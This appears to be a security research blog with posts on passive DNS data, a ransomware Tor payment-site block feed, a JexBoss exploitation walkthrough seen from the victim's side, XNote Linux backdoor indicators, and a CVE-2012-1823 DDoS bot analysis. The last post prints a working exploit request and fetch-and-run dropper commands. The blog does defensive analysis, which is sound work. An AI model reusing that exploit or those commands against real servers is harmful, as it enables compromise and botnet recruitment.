        trump-email.com. SOA ns1.cdcservices.com. postmaster.centralservices.local. 2012062509 1200 120 1209600 3600

    bailiwick: trump-email.com.  count: 2106  first seen: 2014-12-04 23:24:31 -0000  last seen: 2016-09-23 13:47:43 -0000
        trump-email.com. SOA ns1.cdcservices.com. postmaster.centralservices.local. 2012062510 1200 120 1209600 3600

    bailiwick: trump-email.com.  count: 1  first seen: 2011-09-13 21:38:59 -0000  last seen: 2011-09-13 21:38:59 -0000
        trump-email.com. MX 10 mx20.cdcservices.com.
        trump-email.com. MX 20 mx21.cdcservices.com.

    bailiwick: trump-email.com.  count: 18  first seen: 2017-03-11 03:22:33 -0000  last seen: 2017-03-17 21:40:00 -0000
        trump-email.com. MX 0 smtp.secureserver.net.
        trump-email.com. MX 10 mailstore1.secureserver.net.

    bailiwick: trump-email.com.  count: 12  first seen: 2011-12-14 22:04:06 -0000  last seen: 2016-09-23 08:36:45 -0000
        trump-email.com. MX 10 incoming.cdcservices.com.

    bailiwick: trump-email.com.  count: 10  first seen: 2014-11-14 11:17:46 -0000  last seen: 2016-09-23 12:59:33 -0000
        trump-email.com. TXT "Internet Solution from Cendyn.com."
        trump-email.com. TXT "v=spf1 ip4:198.91.42.0/23 ip4:64.135.26.0/24 ip4:64.95.241.0/24 ip4:206.191.130.0/24 ip4:63.251.151.0/24 ip4:69.25.15.0/24 mx ~all"

    bailiwick: trump-email.com.  count: 17  first seen: 2011-05-07 03:06:37 -0000  last seen: 2017-03-10 05:43:42 -0000
        www.trump-email.com. CNAME trump-email.com.

    bailiwick: trump-email.com.  count: 2  first seen: 2017-03-10 15:46:36 -0000  last seen: 2017-03-10 15:46:36 -0000
        mail.trump-email.com. A 184.168.221.46

    bailiwick: trump-email.com.  count: 4  first seen: 2011-05-07 03:06:37 -0000  last seen: 2016-09-23 12:10:41 -0000
        mail.trump-email.com. CNAME mx3.cdcservices.com.

    bailiwick: trump-email.com.  count: 119  first seen: 2012-12-19 15:37:59 -0000  last seen: 2013-07-12 18:14:52 -0000
        _client._smtp.trump-email.com. CNAME trump-email.com.

    bailiwick: trump-email.com.  count: 8  first seen: 2017-03-08 23:40:31 -0000  last seen: 2017-03-16 22:30:04 -0000
        links.trump-email.com. A 184.168.221.46

    bailiwick: trump-email.com.  count: 163659  first seen: 2010-07-05 07:37:16 -0000  last seen: 2016-09-22 19:45:03 -0000
        links.trump-email.com. CNAME customers.listrak.com.

    bailiwick: trump-email.com.  count: 20608  first seen: 2010-07-02 19:20:22 -0000  last seen: 2016-09-13 01:47:56 -0000
        mail1.trump-email.com. A 66.216.133.29

    bailiwick: trump-email.com.  count: 57  first seen: 2017-03-08 04:32:26 -0000  last seen: 2017-03-17 00:15:59 -0000
        mail1.trump-email.com. A 184.168.221.46

    bailiwick: trump-email.com.  count: 2  first seen: 2017-03-10 15:46:41 -0000  last seen: 2017-03-10 15:46:41 -0000
        mail2.trump-email.com. A 184.168.221.46

    bailiwick: trump-email.com.  count: 1  first seen: 2017-03-17 21:40:00 -0000  last seen: 2017-03-17 21:40:00 -0000
        ctudgrekow.trump-email.com. A 184.168.221.46

    bailiwick: trump-email.com.  count: 2  first seen: 2016-09-23 08:36:46 -0000  last seen: 2016-09-23 08:36:46 -0000
        dw6w3yzfw6.trump-email.com. CNAME trump-email.com.

    bailiwick: trump-email.com.  count: 5  first seen: 2017-03-11 03:22:33 -0000  last seen: 2017-03-11 03:22:33 -0000
        i6myzht210.trump-email.com. A 184.168.221.46

    bailiwick: trump-email.com.  count: 5  first seen: 2017-03-15 22:45:24 -0000  last seen: 2017-03-15 22:45:24 -0000
        k8v362jbh7.trump-email.com. A 184.168.221.46
    bailiwicktrump-email.com.
    count2
    first seen2016-09-23 08:59:55 -0000
    last seen2016-09-23 08:59:55 -0000
    s4ddlkd49j.trump-email.com.CNAMEtrump-email.com.
    bailiwicktrump-email.com.
    count2
    first seen2016-09-23 08:56:36 -0000
    last seen2016-09-23 08:56:36 -0000
    t59hykhmfc.trump-email.com.CNAMEtrump-email.com.
    bailiwicktrump-email.com.
    count1
    first seen2017-03-17 21:18:09 -0000
    last seen2017-03-17 21:18:09 -0000
    thej35t3rpwns.trump-email.com.A184.168.221.46
    Returned 30 RRsets in 0.04 seconds.

    Tuesday, January 10, 2017

    Threat Intel - Ransomware Payment Sites Feed


    There are a number of great sites dedicated to ransomware threat feeds. The observables with the most value are the download/dropper sites and the C2 sites.

    These lists of observables help incident response teams limit the spread of an infection through their local environments.

    Unfortunately, malware authors frequently slip in under the radar, and we find individual users trying to rectify the problem on their own. They visit the payment site and pay the ransom, which keeps IT teams in the dark. Regardless of what side of the debate you're on, hiding the ransom payment makes it hard for teams to build countermeasures or even understand that they have a problem.

    Using a spare Raspberry Pi, we've started mapping out ransomware domains. Our project operationalizes data from Harry71, Ahmia and VisiTOR; their excellent work in mapping TOR makes this feed possible. Finally, as we stumble upon malware samples and analyze them, the results of that analysis are fed into the tool.

    After enumerating the .onion sites, we combine the data with known Web2Tor gateways that are commonly used by malware authors, and compile a suggested notification or block list.

    Because our research is largely automated, there may be occasional legitimate .onion sites on the list. We do our very best to screen and remove these quickly.

    Our goal is to combine this useful data into actionable indicators of warning for IT/IR teams to use in their IDS or SIEM. Ideally you would never see these observables in your environment, but if they do hit, it is important to act on them immediately.


    For example, here is a snippet of a feed generated on December 25, 2016:

    # Ransomware Payment Sites on TOR.
    # List provided with no warranty by DeepEndResearch.
    # Commercial use with permission only.
    # There may be false positives in this list. It should be used as an Indicator of Warning list only.
    # This file is updated daily.
    qli26fihoid5qwo5.onion
    qli26fihoid5qwo5.anonym.to
    qli26fihoid5qwo5.hiddenservice.net
    qli26fihoid5qwo5.onion.cab
    qli26fihoid5qwo5.onion.nu
    qli26fihoid5qwo5.onion.to
    qli26fihoid5qwo5.s1.tor-gateways.de
    qli26fihoid5qwo5.s2.tor-gateways.de
    qli26fihoid5qwo5.s3.tor-gateways.de
    qli26fihoid5qwo5.s4.tor-gateways.de
    qli26fihoid5qwo5.s5.tor-gateways.de
    qli26fihoid5qwo5.tor2web.fi
    qli26fihoid5qwo5.onion?lang=de
    qli26fihoid5qwo5.anonym.to
    qli26fihoid5qwo5.hiddenservice.net
    qli26fihoid5qwo5.onion.cab
    qli26fihoid5qwo5.onion.nu
    qli26fihoid5qwo5.onion.to
    qli26fihoid5qwo5.s1.tor-gateways.de
    qli26fihoid5qwo5.s2.tor-gateways.de
    qli26fihoid5qwo5.s3.tor-gateways.de
    qli26fihoid5qwo5.s4.tor-gateways.de
    qli26fihoid5qwo5.s5.tor-gateways.de
    qli26fihoid5qwo5.tor2web.fi

    Our feed is updated daily and posted here:

    https://files.deependresearch.org/feeds/ransomware/ransomware-payment-sites.txt

    We make several attempts to remove sites that are no longer operational within 24-48 hours.


    One way you may try to operationalize this data in a Splunk environment:
    Convert the feed to a CSV file (schedule this as a daily cron job on your Splunk search head):

    #!/usr/bin/env python3
    import csv
    import requests

    FEED_URL = 'https://files.deependresearch.org/feeds/ransomware/ransomware-payment-sites.txt'

    if __name__ == '__main__':
        # Keep TLS verification on (the default) so a tampered feed is rejected,
        # and bound the request so a stalled download does not hang the cron job.
        resp = requests.get(FEED_URL, timeout=60)
        resp.raise_for_status()
        with open('ransomware_payment_site.csv', 'w', newline='') as fh:
            writer = csv.writer(fh)
            writer.writerow(['domain', 'notes'])
            for line in resp.text.splitlines():
                line = line.strip()
                # Skip the '#' header comments and anything that is not a hostname.
                if not line or line.startswith('#') or '.' not in line:
                    continue
                writer.writerow([line, 'DeepEndResearch Suspected Ransomware Payment Site'])
    Then schedule a search that uses inputlookup against that CSV at an interval that works for your environment.
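    As an added example (not DeepEndResearch's code), the following script parses a feed in the format shown above, renders the Splunk lookup CSV, and runs constructed proxy log lines against it; it also catches a listed .onion id reached through a Web2Tor gateway the feed does not list. The feed text, onion id and log lines are constructed samples.

```python
"""Match log hostnames against the ransomware payment-site feed.

Added example, not DeepEndResearch's code. FEED_SAMPLE is a constructed
sample in the format of the snippet above ('#' comments, then one host
per line, each .onion site expanded to its Web2Tor gateway forms); the
proxy log lines are constructed too.
"""
import csv
import io
from urllib.parse import urlsplit

FEED_SAMPLE = """\
# Ransomware Payment Sites on TOR.
# There may be false positives in this list. Indicator of Warning only.
qli26fihoid5qwo5.onion
qli26fihoid5qwo5.onion.to
qli26fihoid5qwo5.tor2web.fi
qli26fihoid5qwo5.onion?lang=de
"""
BASE32 = set("abcdefghijklmnopqrstuvwxyz234567")


def onion_id(host):
    """The 16-char v2 onion id if host's first label is one, else None."""
    first = host.split(".", 1)[0]
    return first if len(first) == 16 and set(first) <= BASE32 else None


def parse_feed(text):
    """Return (hosts, onion_ids): exact entries to match, plus bare onion
    ids so a site reached via a gateway the feed omits is still caught."""
    hosts, ids = set(), set()
    for raw in text.splitlines():
        line = raw.strip().lower()
        if not line or line.startswith("#") or "." not in line:
            continue
        # Some entries carry a query string or path ('x.onion?lang=de').
        host = line.split("?", 1)[0].split("/", 1)[0]
        hosts.add(host)
        oid = onion_id(host)
        if oid:
            ids.add(oid)
    return hosts, ids


def to_splunk_csv(hosts, note="DeepEndResearch Suspected Ransomware Payment Site"):
    """Render the domain,notes lookup file the Splunk step above uses."""
    buf = io.StringIO()
    writer = csv.writer(buf, lineterminator="\n")
    writer.writerow(["domain", "notes"])
    for host in sorted(hosts):
        writer.writerow([host, note])
    return buf.getvalue()


def classify_host(host, hosts, ids):
    """'feed-hit' for an exact entry, 'onion-id-hit' for a listed onion id
    behind any other gateway, None otherwise."""
    host = host.lower().rstrip(".")
    if host in hosts:
        return "feed-hit"
    if onion_id(host) in ids:
        return "onion-id-hit"
    return None


# Constructed squid-style lines: timestamp, client, method, URL.
PROXY_LOG = [
    "1482662400.101 10.0.0.5 GET http://qli26fihoid5qwo5.onion.cab/?lang=de",
    "1482662401.202 10.0.0.7 GET http://www.example.com/index.html",
    "1482662402.303 10.0.0.9 CONNECT qli26fihoid5qwo5.tor2web.fi:443",
]


def scan_proxy_log(lines, hosts, ids):
    """(client, host, verdict) for each line whose host matches the feed."""
    hits = []
    for line in lines:
        parts = line.split()
        if len(parts) < 4:
            continue
        url = parts[3]
        host = urlsplit(url if "://" in url else "//" + url).hostname
        verdict = classify_host(host, hosts, ids) if host else None
        if verdict:
            hits.append((parts[1], host, verdict))
    return hits
```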

    We hope that you find this feed useful.  Please feel free to comment or offer us suggestions!

    Tuesday, April 12, 2016

    JBoss exploits - View from a Victim


    JBOSS

    Over the past few months, the distribution vector for "Ransomware" has shifted to a more targeted approach.

    Several hospitals and healthcare organizations recently found themselves the victim of a widespread Ransomware infection.
    Exploits against JBoss are believed to be responsible for several of these incidents, where a compromised JBoss server allowed access to the hospital's internal network.

    For an excellent writeup of Ransomware infections using the JBoss exploits, see the Cisco Talos blog: "SamSam: The Doctor Will See You, After He Pays the Ransom"
    Note that "JexBoss" is described as the exploit tool of choice.  JexBoss exploits very old vulnerabilities in JBoss, and takes advantage of poor upgrading or patching policies.

    Via Shodan or Google 'dorking', one can determine that there are a great many JBoss deployments.
    It is safe to assume that many of these deployments remain vulnerable.
    While healthcare and hospitals are the target 'du jour', other high profile industry segments running old JBoss may be targeted next.

    In an effort to raise awareness of the JexBoss exploit and what it looks like from the victim's point of view, we stood up two vulnerable JBoss servers and exploited them using JexBoss.
    We're providing some screenshots of JexBoss in action, along with the network packet captures from the vantage of the victim. We will also provide a list of the Snort and Emerging Threats IDS signatures that currently alert on this traffic.

    Our test environment consisted of two Amazon EC2 instances running Red Hat Linux. I configured the first instance to run JBoss v6, and the other to run JBoss v4.
    Please don't bother to test or "attack" the EC2 instances I used. They are firewalled to the world, except to my IP :)
    The attacking environment was a simple Debian Linux VM with JexBoss installed.

    Attacking JBoss 4

    Running JexBoss against a vulnerable host is quite trivial.  You simply provide the URL of the JBoss instance, and hit Enter.
    The following image shows how JexBoss found the JBoss web-console, jmx-console and JMXInvokerServlet as being vulnerable.

    JexBoss attack against a JBoss v4 host

    In this example, I ran the exploit against jmx-console. I then ran the Linux 'ls' command to display the files on the compromised host.
    Saying "Yes" to automated exploitation of jmx-console will instruct the victim server to pull a remote exploit toolkit named "jbossass.war" from 'joaomatosf.com'.

    Victim server fetching remote exploit toolkit


    Once the exploit code is deployed, a command shell is launched and a few host identification commands are automatically run.
    Subsequent runs of JexBoss will not fetch the toolkit if it is already present on the victim host.

    In this next example, I ran the exploit against the JBoss web-console.
    Once the toolkit is resident on the JBoss instance via the JexBoss exploit, you can use the compromised host to fetch more files of your choice.  Note how I used the 'curl' command to fetch a remote text file and display it on the console.


    Using JexBoss to fetch a remote file via the compromised host.

    In this example, I fetched the same file and saved it to the compromised host. Running the Linux 'ls' command after the fetch reveals that the file is now resident on the JBoss host.

    Using JexBoss to fetch and save a remote file to the compromised host.

    Here is a look at a log segment from the victim host after the exploits were run.  A few exceptions are thrown, and Warnings and Info are logged.


    Log file segment showing Warnings and Info after JexBoss exploit

    Attacking JBoss v6

    Attacking JBoss v6 is quite similar, except the web-console is not vulnerable, and exploiting the JMXInvokerServlet can be hit or miss.
    However, the jmx-console is as easily exploited as it was in JBoss version 4.

    JexBoss exploit against the jmx-console on a JBoss v6 host


    JexBoss exploit against the jmx-console on a JBoss v6 host - Remote file fetch

    Summary:

    By virtue of this very simple exploit tool, it's quite apparent that old versions of JBoss are extremely vulnerable to full attacker control.
    With the continually evolving news of organizations falling victim to ransomware via JBoss exploits, it is of critical urgency that any JBoss instance be checked and patched.
    I actually wonder how many organizations are even aware that they are running JBoss, let alone a vulnerable instance of it.

    A breakdown of the security vulnerabilities in JBoss, the versions affected, and the pertinent dates, can be found at CVEDetails - JBoss
    We wanted this post to provide a glimpse of a JBoss exploit from the vantage of the victim. We hope that this blog post helps raise further awareness of this serious threat, and provides some additional information to help detect and defend against these attacks.

    Files and Additional Information:

    IDS Signatures:

    The following Snort and Emerging Threats IDS signatures will detect these JexBoss probes and exploits:

    [1:2014017:1] ET WEB_SERVER JBoss jmx-console Probe

    [1:2801445:3] ETPRO EXPLOIT RedHat JBoss Enterprise Application Platform JMX Console Authentication Bypass

    [1:24642:4] SERVER-WEBAPP RedHat JBoss Enterprise Application Platform JMX code execution attempt

    [1:18794:9] SERVER-WEBAPP RedHat JBoss Enterprise Application Platform JMX authentication bypass attempt

    [1:21516:9] SERVER-WEBAPP JBoss JMX console access attempt

    [1:1054:14] SERVER-WEBAPP weblogic/tomcat .jsp view source attempt
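    Alongside the IDS signatures, the same activity can be triaged from the JBoss host's own web access log. As an added example, not from the post or from JexBoss, the script below classifies requests to the three console paths the post names (jmx-console, web-console, JMXInvokerServlet) over constructed Apache-style log lines; ADMIN_NETS is an assumed management range from which your own administrators use the consoles.

```python
"""Triage JBoss console access in a web access log (JexBoss-style activity).

Added example, not from the post or from JexBoss. The log lines are
constructed in Apache combined-log form; the three paths are the ones the
post reports JexBoss probing. ADMIN_NETS is an assumption: the ranges from
which your own administrators legitimately use the consoles.
"""
import ipaddress
import re

JBOSS_ADMIN_PATHS = ("/jmx-console", "/web-console", "/invoker/JMXInvokerServlet")
ADMIN_NETS = [ipaddress.ip_network("10.0.0.0/8")]
SEVERITY = {"blocked": 1, "probe": 2, "deploy-attempt": 3}

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<url>\S+) [^"]*" (?P<status>\d{3})'
)


def classify(method, url, status):
    """None for non-console traffic; otherwise how far the request got."""
    path = url.split("?", 1)[0]
    if not any(path == p or path.startswith(p + "/") for p in JBOSS_ADMIN_PATHS):
        return None
    if status in (401, 403):
        return "blocked"          # console exists but authentication held
    if method == "POST" or ".war" in url.lower():
        return "deploy-attempt"   # writing through the console (the jbossass.war case above)
    return "probe"                # GET/HEAD on a console that answered


def scan_access_log(lines):
    """One finding per console request: (ip, verdict, from_admin_net)."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        verdict = classify(m.group("method"), m.group("url"), int(m.group("status")))
        if verdict is None:
            continue
        ip = ipaddress.ip_address(m.group("ip"))
        internal = any(ip in net for net in ADMIN_NETS)
        findings.append((str(ip), verdict, internal))
    return findings


def triage(findings):
    """Worst verdict per external source; admin-net traffic is dropped."""
    worst = {}
    for ip, verdict, internal in findings:
        if internal:
            continue
        if SEVERITY[verdict] > SEVERITY.get(worst.get(ip), 0):
            worst[ip] = verdict
    return worst


# Constructed access log: one external host probing, then posting to jmx-console.
ACCESS_LOG = [
    '203.0.113.5 - - [12/Apr/2016:14:02:11 +0000] "HEAD /jmx-console/ HTTP/1.1" 200 0',
    '203.0.113.5 - - [12/Apr/2016:14:02:12 +0000] "HEAD /web-console/ HTTP/1.1" 401 0',
    '203.0.113.5 - - [12/Apr/2016:14:02:15 +0000] "POST /jmx-console/ HTTP/1.1" 200 512',
    '198.51.100.7 - - [12/Apr/2016:14:05:40 +0000] "GET /invoker/JMXInvokerServlet HTTP/1.1" 200 1234',
    '10.1.2.3 - - [12/Apr/2016:14:06:01 +0000] "GET /jmx-console/ HTTP/1.1" 200 9982',
    '198.51.100.8 - - [12/Apr/2016:14:07:30 +0000] "GET /index.html HTTP/1.1" 200 3011',
]
```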

    Packet Captures

    JexBoss attack traffic - Vantage of a JBoss version 6 host:  

    JexBoss attack traffic - Vantage of a JBoss version 4 host (remote toolkit fetch):

    JexBoss attack traffic - Vantage of a JBoss version 4 host (remote file fetch and display):

    JexBoss attack traffic - Vantage of a JBoss version 4 host (remote file fetch and save to victim host):


    Monday, February 9, 2015

    Linux.BackDoor.XNote.1 indicators

    We continue to see a variety of Linux ELF malware, particularly those focused on DDoS.
    Over the past few years, the good folks at Malware Must Die have done an extensive study of ELF malware variants at their blog: http://blog.malwaremustdie.org/

    Today, DrWeb wrote about a multipurpose Linux ELF called 'xnote', that opens a backdoor on the compromised host.  The host is then used for a variety of functions, including as a DDoS bot.
    The DrWeb posts provide a very good analysis of the malware and its overall structure.
    http://news.drweb.com/show/?i=9272&lng=en&c=5
    http://vms.drweb.com/virus/?i=4323517

    We decided to take a closer look at this sample in order to provide a few indicators that may be of interest.
    The xnote sample we studied has MD5 hash f374d1561e553a4c5b803e1d9d15a34e.

    Upon execution, we noted that the sample contacted a DNS server at 114.114.114.114 with queries for the following domains:

    • a.et2046.com
    • b.et2046.com
    • c.et2046.com
    Each query returned the IP address 122.10.85.54.

    In our run, the malicious 'xnote' process had process ID 1303. Using 'volatility' to map the process memory, we noted:
    Volatility Foundation Volatility Framework 2.4
    Pid  Start      End        Flags Pgoff    Major Minor Inode  Path              
    1303   0xc01000   0xc02000 r-x        0x0     8     1 405848 /home/mattyh/xnote
    1303  0x8048000  0x81ba000 r-x        0x0     0     0      0                   
    1303  0x81ba000  0x81c4000 rwx        0x0     0     0      0                   
    1303  0xa137000  0xa158000 rwx        0x0     0     0      0 [heap]            
    1303 0xb78b6000 0xb78b7000 r-x        0x0     0     0      0 [vdso]            
    1303 0xbf843000 0xbf859000 rwx        0x0     0     0      0 [stack]

    Dumping the associated data from each segment, we were able to recover a few artifacts from the process, including the domains queried.

    XXXXXXXXXXXXXXXX122.10.85.54
    a.et2046.com
    b.et2046.com
    c.et2046.com
    e.et2046.com
    test
    CAk[S
     !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
    .,-+xX0123456789abcdef0123456789ABCDEF-+xX0123456789abcdefABCDEF
    -0123456789

    -0123456789


    Domain and IP Information:

    It is interesting to note that the domain "et2046.com" has been seen before in other Linux ELF malware.
    • Note this post to an Ubuntu forum from May, 2014 where the subdomains 'kill.et2046.com' and 'sb.et2046.com' were noted in a running process on a compromised Ubuntu host.
    • Malware Must Die posted an analysis of the Linux iptablex malware where these domains were also seen:
    • Via VirusTotal searches, we find related malware to these domains:


    Obtaining Passive DNS information from FarSight Security's DNSDB, we see that currently for IP address 122.10.85.54 the only DNS records are:

    www.qtol.tv. A 122.10.85.54

    Additional information from DNSDB for the domain et2046.com:

    count 54
    first seen in zone file 2014-11-12 17:13:42 -0000
    last seen in zone file 2015-01-13 17:23:33 -0000
    et2046.com. NS a.dnspod.com.
    et2046.com. NS b.dnspod.com.
    et2046.com. NS c.dnspod.com.


    count 329
    first seen in zone file 2013-12-17 17:13:33 -0000
    last seen in zone file 2014-11-11 17:12:29 -0000
    et2046.com. NS ns155.dnsever.com.
    et2046.com. NS ns165.dnsever.com.
    et2046.com. NS ns179.dnsever.com

    Note that the malware uses a hardcoded DNS server on 114.114.114.114 to provide all domain resolution.   This is a public DNS server based in China, with its web page at www.114dns.com



    whois - 114.114.114.114

    inetnum:        114.114.0.0 - 114.114.255.255
    netname:        XFInfo
    descr:          NanJing XinFeng Information Technologies, Inc.
    descr:          Room 207, Building 53, XiongMao Group, No.168 LongPanZhong Road
    descr:          Xuanwu District, Nanjing, Jiangsu, China
    country:        CN
    irt:            IRT-CNNIC-CN
    address:        Beijing, China
    e-mail:         ipas@cnnic.cn
    abuse-mailbox:  ipas@cnnic.cn

    person:         Yan Jian
    nic-hdl:        YJ1777-AP
    e-mail:         jyan@greatbit.com

    person:         Zhao Zhenping
    nic-hdl:        ZZ2094-AP
    e-mail:         ping@greatbit.com

    whois- 122.10.85.54

    inetnum:        122.10.80.0 - 122.10.95.255
    netname:        TOINTER-CN
    descr:          Royal Network Technology Co., Ltd. in Guangzhou
    country:        HK
    admin-c:        WX2631-AP
    tech-c:         WX2631-AP
    status:         ASSIGNED NON-PORTABLE
    mnt-by:         MAINT-CN-TOINTER122
    mnt-irt:        IRT-TOINTER-CN
    changed:        tengdayx@gmail.com 20150112
    source:         APNIC

    irt:            IRT-TOINTER-CN
    address:        Liwan District of Guangzhou, Guangdong Fangcun West 533, guangzhou guangdong 510360
    e-mail:         abuse@gzroyal.cn
    abuse-mailbox:  abuse@gzroyal.cn
    admin-c:        RNTC1-AP
    tech-c:         RNTC1-AP
    auth:           # Filtered
    mnt-by:         MAINT-TOINTER-CN
    changed:        hm-changed@apnic.net 20140919
    source:         APNIC

    person:         Wei XeiJun
    address:        Liwan District of Guangzhou, Guangdong Fangcun West 533
    country:        CN
    phone:          +86.1234567890
    e-mail:         tengdayx@qq.com
    nic-hdl:        WX2631-AP
    mnt-by:         MAINT-TOINTER-CN
    changed:        tengdayx@qq.com 20150111


    'whois' for Domain et2046.com

    Domain Name: ET2046.COM
    Registry Domain ID: 1762221508_DOMAIN_COM-VRSN
    Registrar WHOIS Server: whois.godaddy.com
    Registrar URL: http://www.godaddy.com
    Update Date: 2014-08-25T06:58:17Z
    Creation Date: 2012-11-27T14:02:55Z
    Registrar Registration Expiration Date: 2016-11-27T14:02:55Z
    Registrar: GoDaddy.com, LLC
    Registrar IANA ID: 146
    Registrar Abuse Contact Email: abuse@godaddy.com
    Registrar Abuse Contact Phone: +1.480-624-2505

    Registry Registrant ID: 
    Registrant Name: smaina smaina
    Registrant Organization: 
    Registrant Street: Beijing
    Registrant City: Beijing
    Registrant State/Province: Beijing
    Registrant Postal Code: 100080
    Registrant Country: China
    Registrant Phone: +86.18622222222
    Registrant Phone Ext: 
    Registrant Fax: 
    Registrant Fax Ext: 
    Registrant Email: tuhao550@gmail.com


    -----------------------------------------------------------------------------------------------------------------------
    (Uses same password scheme as Contagio.  Ping me or Mila for details if needed)

    Thursday, February 5, 2015

    Library of Malware Traffic Patterns


    Update February 2015 
    Use the new link below for a new interface and updates.

    Traffic analysis has been the primary method of malware identification, and the thousands of IDS signatures developed are the daily proof. Signatures definitely help, but the ability to visually recognize malware traffic patterns has always been an important skill for anyone tasked with network defense. The number of malware analysis blogs and papers is overwhelming, and it is difficult to keep track of malware features if you don't have access to a well designed and constantly updated malware database. This started as a "personal notes" spreadsheet with GET and POST requests for different malware families, with information from open sources. We decided others might find it useful too.

    Click on the column headers to see recent entries. Use other column headers to sort as needed. Wait a few seconds for the table to load from the Google Sheet. URI and User-Agent fields might have spaces for easier cell wrapping. Remove them if you export the data.
    Yes, you can download samples mentioned in the spreadsheet. See the "dl" column in the full spreadsheet table and corresponding links to the download location. Use "Contagio" password scheme (email Mila or admin at deependresearch.org)
    Image credit: Jay Walker Library. Src.Vancouversun

    VIEW OR DOWNLOAD "MALWARE TRAFFIC PATTERNS"

     List of malware families and available downloads for their samples, pcaps (click on the link above for the full post)


    Tuesday, July 8, 2014

    Another Linux DDoS bot via CVE-2012-1823

    If you run a web server, you should be very familiar with the PHP vulnerability classified as CVE-2012-1823.  Successful exploitation of this vulnerability allows a remote attacker to inject arbitrary code via command line options within the HTTP query string.  Unfortunately, there remain a large number of PHP servers that do not have this vulnerability patched, making them an ideal vehicle for acting as a DDoS bot.  

    Our friends at MalwareMustDie have recently put up several excellent posts discussing Linux malware, particularly dealing with DDoS.  While they have covered a wide spectrum of Linux malware in the wild, it seems that new variants and bot infrastructures are continually being spun up.  We like to study and track these variants and infrastructures, as well as the payloads that are being injected.  In this case, one particular payload caught our eye.

    In this case, the exploit attempt was URL-encoded as follows:

    POST //cgi-bin/php?%2d%64+%61%6c%6c%6f%77%5f%75%72%6c%5f%69%6e%63%6c%75%64%65%3d%6f%6e+%2d%64+%73%61%66%65%5f%6d%6f%64%65%3d%6f%66%66+%2d%64+%73%75%68%6f%73%69%6e%2e%73%69%6d%75%6c%61%74%69%6f%6e%3d%6f%6e+%2d%64+%64%69%73%61%62%6c%65%5f%66%75%6e%63%74%69%6f%6e%73%3d%22%22+%2d%64+%6f%70%65%6e%5f%62%61%73%65%64%69%72%3d%6e%6f%6e%65+%2d%64+%61%75%74%6f%5f%70%72%65%70%65%6e%64%5f%66%69%6c%65%3d%70%68%70%3a%2f%2f%69%6e%70%75%74+%2d%64+%63%67%69%2e%66%6f%72%63%65%5f%72%65%64%69%72%65%63%74%3d%30+%2d%64+%63%67%69%2e%72%65%64%69%72%65%63%74%5f%73%74%61%74%75%73%5f%65%6e%76%3d%30+%2d%64+%61%75%74%6f%5f%70%72%65%70%65%6e%64%5f%66%69%6c%65%3d%70%68%70%3a%2f%2f%69%6e%70%75%74+%2d%6e HTTP/1.1
    Content-Length: 188
    Content-Type: application/x-www-form-urlencoded
    Host: -h

    When decoded, the actual URL is:

    Decoded CVE-2012-1823 exploit attempt

    Upon successful compromise, the attacker injects the following:

    <? system("cd /tmp ; wget <redacted>.us.to/seed.jpg ; curl -O http://<redacted>.us.to/seed.jpg ; fetch http://<redacted>.us.to/seed.jpg ; tar -xzvf seed.jpg ; chmod +x seed ; ./seed ; rm -rf * "); ?>

    "seed.jpg" is actually a tar file, which when expanded reveals a bash script named "seed":

    #!/bin/bash
    cd /var/tmp/ ;wget <redacted>.us.to/index.htm; curl -O http://<redacted>.us.to/index.htm; fetch http://<redacted>.us.to/index.htm; tar -xzvf index.htm;rm -rf index.htm; perl /var/tmp/libssl3.so.2 ; rm -rf *; wget <redacted>.us.to/stats.php;fetch http://<redacted>.us.to/stats.php ;curl -O http://<redacted>.us.to/stats.php; tar -xzvf stats.php ; rm -rf stats.php ; cd .d ;./autorun

    This script instructs the compromised server to fetch 'index.htm' from http://<redacted>.us.to. This again is a tar file, which when expanded, gives a file named "libssl3.so.2".  This file is actually a perl script called "DDoS Perl IrcBot v1.0 / 2012 by DDoS Security Team".  A copy of this popular IRCBot can be found at this PasteBin link.

    Some of the configuration variables for the version of IrcBot dropped on our honeypots include:
    $server = 'antiq.scifi.ro'
    $server = 'antiq.evils.in'
    my @admins = ("AnTiQ","deathy","Vasy");
    my @hostauth = ("Qiss.users.undernet.org","Amadeo.users.undernet.org");
    my @channels = ("#vnc");

    The "seed" script also instructed our server to download "stats.php". This was also a tar file, which when expanded created a hidden directory named ".d" containing the following files:

    Contents of hidden 'd' subdirectory
    The subdirectory "c" contained source files for port flooding routines.

    Contents of 'c' subdirectory


    Section of "Slashing SirVic's" flooding source code.

    Two other files included in the "stats.php" tarball were of particular interest.  They are named "bang.txt" and "shiet.txt", and contain long lists of IP addresses and ports.  At this point, it's not clear what these lists represent, however "bang.txt" appears to contain many non-U.S addresses, notably weighted toward Romania.  "shiet.txt" contains a wide variety of IP addresses, representing many kinds of organizations, corporations, universities, and service providers.
    After observing several DDoS attacks initiated by this infrastructure, we didn't note a correlation between these lists, and any attack victims.  We also did not yet observe any correlation between these lists and compromised hosts initiating DDoS attack traffic.

    The contents of "bang.txt", broken out by ASN and Network name can be viewed from here: Link to "bang.txt"

    The contents of "shiet.txt", broken out by ASN and Network name can be viewed from here:  Link to "shiet.txt"

    Soon after the script downloads, our server joined the IRC C2 on antiq.scifi.ro (195.182.159.51).

    Bot joining C2 on antiq.scifi.ro
    Not long after that, a command initiating a flood attack against 70.39.96.225 arrives, and the compromised host begins sending fragmented UDP packets to the victim.


    Bot being instructed to begin UDP flood to victim

    Packet capture of UDP flood
    We've observed this botnet as being very active, targeting a wide variety of victims.   While IRC botnets have been around for many years, the seeding and attack mechanisms continue to evolve.

    Unpatched CMS installs, weak SSH passwords, and vulnerable PHP deployments remain a major weak spot in Internet facing servers. It's pretty safe to say that if web site administrators do not run a regular, stringent patch management program, it's just a matter of 'when', not 'if', they will be compromised.